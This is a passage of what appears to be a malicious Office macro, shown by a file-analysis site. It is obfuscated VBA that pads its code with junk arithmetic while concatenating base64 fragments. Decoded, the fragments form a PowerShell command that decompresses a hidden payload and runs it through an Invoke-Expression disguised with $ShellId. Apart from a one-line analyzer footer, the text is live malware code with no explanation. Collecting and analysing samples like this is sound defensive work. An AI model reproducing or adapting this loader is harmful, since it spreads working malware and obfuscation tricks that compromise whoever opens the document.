NjCIAjVipI = "DYASABMAHcA" + "PQA9ACcA" + "KQAsAFsAaQBvAC4" + "AYwBPAE0" + "AcAByA" + "EUAcwBzA" + "GkATwBu" + "AC4AYwBvAG0" + "AUAByAEUAUwBTA"
NkloKp = CLng(20164 * CSng(DFPtA + ChrB(HMrKah + CInt(9285))))
LLOQtj = Int(zDPSoM)
GJSdc = BZZGZI
jYnCR = jYZatv
PECzbM = oFhszE
dmmHr = PIaPNA
VSnPOcA = "EkAbwBOAE0ATwB" + "EAGUAXQA6ADoAZA" + "BlAEMAbwBtAHAAc" + "gBlAFMAcwApACA" + "Af" + "AAgAEYA" + "bwBSAEUAYQB" + "DAGgA"
TiJztXv = riowrIX + RaISYoGLV + MBjcjWdd + MkIzhX + NjCIAjVipI + VSnPOcA
End Function
Function DLSNvi()
On Error Resume Next
cuhjY = CLng(65731 * CSng(awWaiN + ChrB(birvFN + CInt(25561))))
lnSCK = Int(Hdmmb)
CtXzU = GpjQM
iInijU = nwWJt
VXjTT = nDMaiG
bqGYZV = pYCacu
iHKJczYbzA = "ewB" + "uAGUAdwAtAG8AQ" + "gBKAEUAYwB0ACAA" + "IABzAH" + "kAcw" + "B0AGUATQA" + "uAGkATw" + "AuAFMAVABSAG" + "UAYQBNAF"
inBfk = CLng(57623 * CSng(wrWVNf + ChrB(ZRhFX + CInt(79804))))
RjaznS = Int(zVIqYS)
PKvzc = czkCM
CPHUVF = YNHbi
LDBVNf = NQKGmH
bQSwYk = PMpAnl
OkuPpMR = "IAZ" + "QBhAEQA" + "ZQB" + "yACgAIAAk" + "AF8ALABbAFQAZQ" + "B4AFQALgB" + "FA" + "G4AQwBvAGQASQ" + "BuAEcAXQA6A" + "DoAQQBzAGMA"
tuIjM = CLng(2598 * CSng(JbdWW + ChrB(bmFAi + CInt(26294))))
dIvKD = Int(zvrLUa)
UUVBWZ = iRooa
MWdHp = Zbrlz
jODVSQ = wbDHR
dJHiL = HkBlb
iKXjvEwFtQ = "aQ" + "BpAC" + "AAKQB" + "9ACkALgBS" + "AGUAQQ"
kWDAT = CLng(56409 * CSng(VEqKCJ + ChrB(YfiaJO + CInt(23254))))
LISwf = Int(sNidc)
iuFvI = YvznzE
LvcFb = MGjLuh
zRdqL = aGRiZi
iqQEY = ObTVP
GLpnrnc = "BkAHQATwBFAE" + "4A" + "RAAoACkAf" + "AAgAC4AIAAoAC" + "AAJABzA" + "Gg"
DBPzB = CLng(67289 * CSng(OmcHR + ChrB(bSdPu + CInt(33586))))
XJsWp = Int(mlTudv)
jIiLI = vNTiG
zvwqkM = EMjtJ
HYvZur = LDZToS
iWpDi = nqhqvi
wEcBTac = "ARQBsAGwASQBEA" + "FsAM" + "QBdACsAJABT" + "AGgAZQBMA" + "GwASQ" + "BkAFsA" + "MQAzAF0AKwAnA" + "HgAJwApAA" + "=="
DLSNvi = iHKJczYbzA + OkuPpMR + iKXjvEwFtQ + GLpnrnc + wEcBTac
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.